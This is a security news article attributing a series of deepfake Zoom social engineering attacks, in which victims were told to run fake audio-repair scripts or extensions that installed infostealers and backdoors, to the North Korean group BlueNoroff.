Security researchers tracking malicious hacker attacks from North Korea say a string of recent social engineering attacks targeting Zoom users is the handiwork of BlueNoroff, a Pyongyang APT that targets financial institutions.
The incidents follow a similar pattern, where the victim joins a Zoom Meeting but experiences audio issues and is instructed to execute malicious extensions or commands that would provide the attackers with full access to their systems.
One month ago, Ability AI founder and CEO Eugene Vyborov said he was targeted by such an attempt. After scheduling a meeting, the attackers sent a link that directed to a fake Zoom call that featured deepfake participants.
When Vyborov’s audio was not connecting, he was directed to a fake Zoom help page instructing him to run terminal commands to fix it.
“At that point, I stopped engaging. When I insisted on switching to Google Meet, they pushed back saying ‘company policy’ prevented that. Minutes later, they deleted our entire Telegram chat and vanished,” Vyborov explained.
In late May, the employee of a Canadian online gambling provider fell victim to a similar attack and ended up with infostealer malware on their system, Field Effect reports. The hackers impersonated a victim’s trusted contacts and Zoom.
“During the call, the victim experienced audio issues and multiple pop-up warnings. The other participant then prompted the victim to run a script masquerading as a Zoom audio repair tool,” Field Effect explains.
The script downloaded and executed a secondary script, which asked the victim for their credentials. The attackers used the credentials in subsequent commands, and downloaded and executed an infostealer and a loader for a fully featured malware implant.
The loader attempted to establish persistence for the main malware, while sensitive information, including browser data and user keychain files, was already being exfiltrated from the system.
In early June, an employee at a cryptocurrency foundation was invited to a group Zoom meeting featuring deepfakes of the company’s senior leadership, according to documentation from cybersecurity vendor Huntress.
When experiencing technical issues with their microphone, the victim was instructed by the deepfakes to download a fake Zoom extension and received a link to it via Telegram.
The extension turned out to be an AppleScript designed to download a payload and execute a script that disabled bash history logging and checked if Rosetta 2 was installed on the system. It would silently install it if not.
As part of the attack, the victim’s system was infected with eight different malicious binaries, identified as the Telegram 2 persistence tool, the Root Troy V4 backdoor, InjectWithDyld (a) loader that drops the benign Base App and another payload, the XScreen keylogger, the CryptoBot infostealer, and the NetChk random numbers generator.
Field Effect and Huntress attributed the attacks they investigated to BlueNoroff, also known as CageyChameleon, Copernicium, Sapphire Sleet, and Stardust Chollima, a North Korean state-sponsored group focused on cryptocurrency theft.
The social engineering technique used in these attacks suggests that BlueNoroff targeted Vyborov as well. Investigating the domain hosting the fake Zoom extension, Validin discovered 200 additional domains likely used by BlueNoroff in similar attacks.
Related: US Seeks Forfeiture of $7.74M in Crypto Tied to North Korean
Related: North Korea Hackers Caught Hijacking Zoom ‘Remote Control’ Feature
Related: North Korean Hackers Distributed Android Spyware via Google Play
Related: North Korean Fake IT Workers Pose as Blockchain Developers
